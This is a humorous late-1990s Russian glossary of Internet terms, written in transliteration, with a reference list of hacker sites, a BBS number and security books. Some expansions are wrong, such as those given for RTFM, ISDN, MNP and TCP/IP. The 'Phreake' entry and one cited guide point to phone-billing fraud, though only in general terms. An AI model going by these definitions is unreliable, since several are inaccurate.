Nechto, kotoroe horosho znayut hakery. Grubo govorya to, chto diskretno
mozhet otobrazit' fotografiyu na vybrannom vami web-obozrevatele.
Hypertext
Nechto predstavlyayushchee dannye tak, chto mozhno legko organizovat'
mezhstranichnye svyazi razlichnyh dokumentov Internet.
Inbox
|lektronnyj pochtovyj yashchik.
Internet
Mirovaya s angloyazychnym uklonom svobodnaya konfederaciya komp'yuternyh
setej, ob®edinyayushchaya bolee 12 tysyach lokal'nyh setej, bolee odnogo milliona
komp'yuterov i okolo 30 millionov yuzerov. Neglasnyj pobeditel' FIDO.
IP Address
Tridcatidvuhbitovyj (nu i slovechko) adres protokola Internet,
vklyuchayushchij v sebya nomer uzla i seti.
IP
Samyj vazhnyj iz vseh protokolov, na kotorom osnovana Internet. CHerez
etot protokol osushchestvlyaetsya pryamoe podklyuchenie k Internet.
IRC
Internet Relay Chat. Odna iz form WWW-psihoza.
IRC chem-to napominaet rabotu v konferenciyah Usenet. No esli tam vy
obshchaetes' ne v real'nom vremeni, to zdes' mozhet vestis' zhivoj razgovor.
Razve chto, -- vas nikto ne slyshit. Vas mogut prochitat'. Vy nabivaete tekst
na klaviature. Vasha informaciya popadaet na obshchij displej. Razlichnye gruppy
vidyat vash bred. Esli interesno -- otvechayut.
IRQ
Preryvanie.
ISDN
Integrated Switched Digital Network. Vysokoskorostnaya cifrovaya
telefonnaya sistema. Tozhe ne dlya nas.
ISP
Internet Service Provider. To zhe, chto i provajder.
Killfile
Fajl, fil'truyushchij stat'i konferencij Usenet. Svoeobraznaya elektronnaya
cenzura.
Knowbot
Sluzhba, pozvolyayushchaya iskat' knigi v elektronnyh bibliotekah.
Lamer
YUzer-idiot. Termin, pridumannyj amerikanskimi sistemnymi
administratorami.
LAN
Local Area Network. Lokal'naya vychislitel'naya set'.
ListServ
Besplatnyj soft, pozvolyayushchij vam cherez spiski rassylki avtomaticheski
dostavlyat' i kontrolirovat' elektronnuyu pochtu.
Login
Registracionnoe imya pol'zovatelya.
Lurk
Passivnye nablyudateli. Naprimer, te, kto tol'ko chitayut novosti
konferencij Usenet ili soobshcheniya, prohodyashchie po kanalam IRC.
Mail server
Pochtovyj server. Komp'yuter, obrabatyvayushchij elektronnuyu pochtu.
Mail
Obmen chastnymi tekstovymi soobshcheniyami v Internet ili v drugoj
komp'yuternoj seti.
Mailing list
Cpisok rassylki elektronnyh pochtovyh soobshchenij, klassificirovannyh po
opredelennym temam. Svoeobraznaya podpiska.
Marquee
Begushchaya stroka v dokumente HTML.
Media
Pochti to zhe, chto Multimedia.
MIME
Multipurpose Internet Mail Extensions. Protokol peredachi zvuka, grafiki
i drugih dvoichnyh dannyh. Primenyaetsya pri peredache pochtovyh soobshchenij. I kak
tol'ko etot MIME ne interpretiruyut!
MNP
Microsom Networking Protocol. Protokol korrekcii oshibok.
Modem
MODulator/DEModulator. Ustrojstvo, peredayushchee cifrovuyu informaciyu po
obyknovennoj telefonnoj linii.
Moose
Odna iz grupp konferencij Usenet. Lider gruppy -- nekto Uil'yam Kassidi.
Mosaic
Drevnejshij graficheskij pol'zovatel'skij interfejs, pozvolyayushchij
prosmatrivat' World Wide Web. Imeyutsya versii dlya X-Window, Windows i
Macintosh.
MPEG
Moving Pictures Expert Group. Protokol, cherez kotoryj upakovyvayutsya
videozapisi.
Multimedia
Ves'ma tumannyj termin, ne perevodyashchijsya na normal'nyj yazyk.
Net server
Setevoj server.
Net
Set'.
Net.god
Bog Seti setej.
Net.personality
Krutoj uchastnik konferencij Usenet.
Netiquette
Cetevoj etiket, otnosyashchijsya k uchastnikam konferencij Usenet.
Newcomer
Novoispechennyj yuzer Internet.
Newsgroup
Oblast' soobshchenij v konferenciyah Usenet.
NNTP
Setevoj protokol, s pomoshch'yu kotorogo ves' mir pol'zuetsya prelestyami ot
konferencij Usenet.
No Dialtone
Soobshchenie modema. V linii otsutstvuet signal.
Node
Uzel seti.
NTFS
Fajlovaya sistema, special'no razrabotannaya dlya operacionnoj sistemy
Windwos NT. Podderzhivaet vosstanovlenie fajlovoj sistemy i nositeli dannyh
ves'ma bol'shogo ob®ema.
OBS
Online Bookstore. |lektronnaya biblioteka.
Offline
Avtonomnyj rezhim raboty komp'yutera.
Online
Interaktivnyj rezhim raboty setevogo komp'yutera.
Password
Parol'. Golovnaya bol' mnogih sistemnyh administratorov. Mozol' na
pal'cah prostyh yuzerov.
PH
Phonebook. Programma-klient PH mozhet byt' ispol'zovana dlya dostupa k
baze dannyh QI, v kotoroj nahodyatsya tonny telefonnyh spravochnikov i massa
drugoj poleznoj informacii.
Phreake
Hakerstvo na telefonnyh liniyah. Generaciya tonov opredelennoj chastoty,
pozvolyayushchaya provodit' mahinacii s oplatoj razgovorov i skanirovanie
telefonnoj seti na predmet obnaruzheniya modemnyh vhodov.
PKZIP
Programma upakovki fajlov.
Pointer
Ukazatel' s sintaksisom URL.
POP
Post Office Protocol. Protokol elektronnoj pochty.
Popmail
Programma, ispol'zuemaya dlya chteniya udalennyh pochtovyh soobshchenij.
Posting
Peredacha soobshcheniya v odnu iz grupp Usenet.
PPP
Point-to-Point-Protocol. Protokol povyshennogo tipa. Naslednik SLIP.
|tot protokol horosh tem, chto on pozvolyaet podklyuchit' vash komp'yuter k
Internet po tak nazyvaemomu protokolu udalennogo dostupa TCP/IP.
Privacy
Nevmeshatel'stvo v lichnuyu zhizn' pol'zovatelya elektronnoj pochty.
Prompt
Pole dannyh udalennogo terminala.
Protocol
Metod, s pomoshch'yu kotorogo peredaetsya informaciya ot hosta k yuzeru.
Provider
Postavshchik nekotoryh uslug. V chastnosti, -- uslug Internet.
Pulse
Odin iz sposobov impul'snogo nabora telefonnogo nomera.
QWK
Format chteniya v interaktivnom rezhime pochtovyh soobshchenij i statej
konferencij Usenet.
Real Time
Interaktivnyj (ne paketnyj) rezhim. To est' rezhim, peredayushchij i
obrabatyvayushchij informaciyu s ves'ma bol'shoj skorost'yu.
Remote computer
Tot samyj server, k kotoromu konnektyatsya.
Remote control
Distancionnoe upravlenie.
Remote
Udalennyj dostup.
RFC
Request For Comment. Ogromnaya kucha elektronnyh dokumentov. Esli ee
razgresti, to mozhno okonchatel'no vyyasnit', chto zhe takoe Internet.
RIP
Routing Internet Protocol. Eshche odin protokol, v debryah kotorogo
zaputalos' nemalo sistemnyh administratorov.
Ripco
Populyarnyj provajder iz slavnogo amerikanskogo goroda CHikago.
Robot
Robot, on i v Afrike robot. Nechto, avtomaticheski zalezayushchee v chuzhuyu
set' bez uchastiya sistemnyh administratorov ili nekotoraya poiskovaya programma
v gipersrede WWW.
Router
Marshrutizator.
RTFM
Read The Following Materials. CHitaj spravochnik, pridurok! Razdrazhennyj
otvet, adresovannyj, kak pravilo tem yuzeram, kotorye zadayut ochevidnye
voprosy.
Script
Scenarij v nekotoroj kommunikacionnoj programme.
Security
Antihakerskij soft. Sladkaya yagodka sistemnogo administratora.
Server
Komp'yuter, sistema kotorogo sposobna organizovat' set'.
SGML
Standard Generalized Markup Language. YAzyk strukturirovannyh yazykov. To
est' yazyk, posredstvom kotorogo vy mozhete opredelit' yazyk indeksirovannyh
dokumentov. YAzyk bolee vysokogo urovnya, chem HTML. V obshchem, yazyk yazykov.
Ponyaten tol'ko ves'ma umnym yuzeram ili hakeram.
Shareware
Uslovno-besplatnoe programmnoe obespechenie, t. e. platite lish' v tom
sluchae, esli hotite poluchit' polnuyu versiyu poluchennogo softa.
Sharing
Sovmestnoe ispol'zovanie.
Shell
Obolochka.
Site
Mesto. Raspolozhenie servera v Internet.
SLIP
Serial Line Internet Protocol. Drevnij protokol povyshennogo tipa.
Pozvolyaet podklyuchit' vash komp'yuter k Internet po protokolu s udalennym
dostupom TCP/IP.
SMTP
Simple Mail Transport Protocol. Protokol obmena pochtovymi soobshcheniyami.
Spam
Prinuditel'nye soobshcheniya, posylaemye cherez elektronnuyu pochtu i
konferencii Usenet.
SSL
Secure Socket Layer. Ves'ma slabyj protokol programmy Netscape.
Prednaznachen dlya zashchity yuzerov. Ili po drugomu: zashchishchennyj protokol samoj
klassnoj i znamenitoj smotrelki kiberprostranstva Netscape Communicator.
Sysop
System operator. Sisop. Sistemnyj operator.
TCP
Transmission Control Protocol. Glavnyj transportnyj protokol. Protokol
upravleniya peredachej. Rabotaet odnovremenno s klientom i protokolom nizkogo
urovnya (IP). Interfejs mezhdu TCP i pol'zovatelem est' otkrytie i zakrytie
soedineniya i otpravka i zagruzka informacii. TCP sovmestim s Telnet i THP.
TCP/IP
Control Protocol/Internet Protocol. Standartnyj setevoj protokol,
pozvolyayushchij vashemu komp'yuteru soedinit'sya s Internet.
Telnet
Special'nyj kommunikacionnyj protokol, pozvolyayushchij cherez opredelennye
komandy poluchat' neposredstvennyj dostup k serveru Internet.
Tone
Tonovyj nabor telefonnogo nomera.
Traffic
Potok.
Twisted pair
Skruchennaya para.
UDP
Protokol transportnogo urovnya, na kotorom sobstvenno i osnovana
Internet.
Upload
Vy peredaete svoi fajly na drugoj komp'yuter.
URL
Uniform Resource Locator. Standartnyj adresnyj format, ukazyvayushchij imya
servera Gopher, WWW, Finger ili FTP.
USB
Universal'naya posledovatel'naya shina. Blagodarya USB vam bol'she ne nuzhno
zadumyvat'sya ob ustanovkah preryvanij IRQ. Vy prosto podklyuchaete ustrojstvo
k raz®emu USB, a sistema sama obespechit sovmestimost' s vashim komp'yuterom.
Vam dazhe ne pridetsya perezapuskat' sistemu.
AGP
Arhitektura graficheskih uskoritelej AGP (Accelerated Graphics Port).
Blagodarya AGP vy mozhete vpolnoj mere nasladit'sya trehmernymi komp'yuternymi
igrami ili oshchutit' vsyu moshch' vashego novogo videoadaptera v programmah
obrabotki trehmernoj grafiki.
Usenet
Odna iz form massovogo elektronnogo psihoza (v horoshem smyle poslednego
slova). V nastoyashchee vremya sushchestvuet okolo 10 000 takih form.
User node
Uzel pol'zovatelya.
Username
Imya pol'zovatelya.
WAN
Wide Area Network. Set' setej. Naprimer, Internet yavletsya Worldwide
WAN.
Webmaster
Sistemnyj administrator Web-servera. On zhe, Pautinych.
WDM
Arhitektura drajverov Win32 (po suti ob®edinyaet apparatnye resursy
Windows 98 i Windows NT), blagodarya kotoroj vy mozhete nastraivat' svoyu
sistemu, ispol'zuya drajvery Windows NT.
White Pages
Spravochnik pol'zovatelej Internet.
Whois
Ishchem elektronnyj adres konkretnogo tipa.
WINZIP
Soft, sozdannyj dlya yuzerov Windows 95. Pozvolyaet raspakovyvat' i
zapakovyvat' fajly.
Workstation
Rabochaya stanciya. Odin iz komp'yuterov, podklyuchennyj k komp'yuternoj seti.
World Wide Web
Informacionnaya sistema Internet, sozdannaya dlya teh yuzerov, kotorye
imeyut vysokoskorostnye modemy. |to oznachaet, chto na ekrane vashego komp'yutera
viden ne prosto golyj tekst, a mul'timedijnyj dokument s kartinkami, poroj
razvorachivayushchimisya tak dolgo, chto hochetsya stuknut' po klaviature ili plyunut'
na ekran monitora.
Yahoo
Pauk s samym polnym spiskom serverov WWW i vozmozhnost'yu besplatnoj
registracii sobstvennoj Web stranicy (http://www.yahoo.com).
ZIP
Populyarnyj format arhivirovaniya fajlov. Naibolee chasto ispol'zuetsya v
programmah MS DOS.
Spisok ispol'zovannoj literatury
Russian Underground Club
http://www.toptown.com/hp/RUC/
e-mail: night_elf@hotmail.com
Russian Underground Server
http://www.russian.lt/
Kryaker Internet
http://kpakep.home.ml.org/
ThE BLUES BROThERS BBS
+7-812-178-8403
Kak ne platit' MGTS za povremenku
Master A. Pixel (SLY FOX)
Modemy
Master A. Pixel (SPY FOX)
Verstak. ZHurnal russkogo hakera.
http://www.chat.ru/~wrkbench/1000.html
Computer Security Basics
Deborah Russell and G.T. Gengemi Sr
Information Systems Security
Philip Fites i Martin Kratz
Computer Related Risks
Peter G. Neumann
Computer Security Management
Karen Forcht
The Stephen Cobb Complete Book of PC and LAN Security
Stephen Cobb
Security in Computing
Charles P. Pfleeger
Building a Secure Computer System
Morrie Gasser
Modern Methods for Computer Security
Lance Hoffman
Protection and Security on the Information Superhighway
Dr. Frederick B. Cohen
Practical Unix Security
Simson Garfinkel and Gene Spafford
Unix System Security
Rik Farrow
Unix Security: A Practical Tutorial
Derek Arnold
Unix Security for the Organization
Richard Bryant
Network Security Secrets
David J. Stang i Sylvia Moon
Complete Lan Security and Control
Peter Davis
Network Security
Steven Shaffer i Alan Simon
Protect Your Privacy: A Guide for PGP Users
William Stallings
Codebreakers
Kahn
The Little Black Book of Computer Viruses
Mark Ludwig
Computer Viruses, Artificial Life and Evolution
Mark Ludwig
A Short Course on Computer Viruses
Dr. Fred Cohen
Engineering and Operations in the Bell System
R.F. Rey
Telephony: Today and Tomorrow
Dimitris N. Chorafas
The Hacker Crackdown
Bruce Sterling
Cyberpunk
Katie Hafner i John Markoff
The Cuckoo's Egg
Cliff Stoll
Hackers: Heroes of the Computer Revolution
Steven Levy
Last-modified: Mon, 16 Aug 1999 18:47:43 GMT